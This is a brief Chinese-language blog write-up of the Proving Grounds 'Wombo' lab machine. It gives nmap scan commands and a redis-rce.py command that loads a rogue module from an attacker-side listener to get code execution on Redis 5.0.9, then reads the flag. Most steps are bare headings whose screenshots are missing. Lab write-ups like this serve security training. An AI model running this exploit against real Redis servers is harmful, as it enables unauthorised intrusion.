Proving Grounds Wombo Writeup
Recon:
进行端口识别:
1 | nmap 192.168.240.69 -p- -n -sT --min-rate 2000 |

1 | nmap 192.168.240.69 -p22,53,80,6379,8080,27017 -sV -sC |

Get Flag:
谷歌搜索Redis key-value store 5.0.9可以获取到一个可能存在的漏洞信息:


根据帮助说明进行尝试:

进行谷歌搜索:

根据说明进行编译:

执行漏洞利用:
1 | python redis-rce.py -r 192.168.240.69 -p 6379 -L 192.168.45.228 -P 6379 -f RedisModules-ExecuteCommand/src/module.so |

读取flag:

All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments







